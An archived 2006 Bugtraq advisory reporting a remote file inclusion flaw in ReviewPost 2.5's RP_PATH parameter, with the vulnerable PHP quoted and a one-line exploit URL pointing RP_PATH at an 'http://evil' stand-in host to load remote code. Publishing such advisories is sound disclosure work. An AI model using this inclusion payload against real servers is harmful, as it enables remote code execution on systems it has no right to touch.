lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 15 Sep 2006 17:01:25 -0000
From: bius@....com
To: bugtraq@...urityfocus.com
Subject: SolpotCrew Advisory #11 - ReviewPost 2.5 (RP_PATH) Remote File
 Inclusion

#############################Solpot Crew Community##############################
#
#  ReviewPost 2.5 (RP_PATH) Remote File Inclusion 
#
#  Donwload File : http://3-bius.com/ReviewPost.zip
#
#################################################################################
#
#
#       Bug Found By :home_edition2001 a.k.a (bius) (15-09-2006)
#
#       contact: bius@....com 
# 
#       Website : http://www.nyubicrew.org/adv/home_edition2001-adv-01.txt
#
################################################################################
#
#
#      Greetz: Solpot,Matdule,Fungky,psycho_l061c,rm_2online,ax[I]xu,can4da_dry
#              imam26_it,ant1casper(tolong tambahin ya)
#              #nyubi , #hitamputih @dalnet
#              and all member solpotcrew community
#              http://www.nyubicrew.org/forum/
#              especially thx to Solpot @ nyubi@....net
#
###############################################################################
Input passed to the "RP_PATH" is not properly verified  
before being used to include files. This can be exploited to execute  
arbitrary PHP code by including files from local or external resources.  

code from index.php

<?php
	require "pp-inc.php";

if ( is_numeric($argv[0]) ) {
    header("Location: {$Globals['maindir']}/showproduct.php?product={$argv[0]}");
    exit;
}

require "$RP_PATH/languages/$rplang/index.php";
require "$RP_PATH/login-inc.php";

if ( file_exists("install.php") || file_exists("{$Globals['maindir']}/install.php") ) {
    diewell( "For security reasons, please remove the install.php from the ReviewPost directory before proceeding." );
    exit;
}

?>

nb : others file has vulnerable too :)

exploit : http://somehost/path_to_ReviewPost/index.php?RP_PATH=http://evil

#############################################################################  
######################################E.O.F##################################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ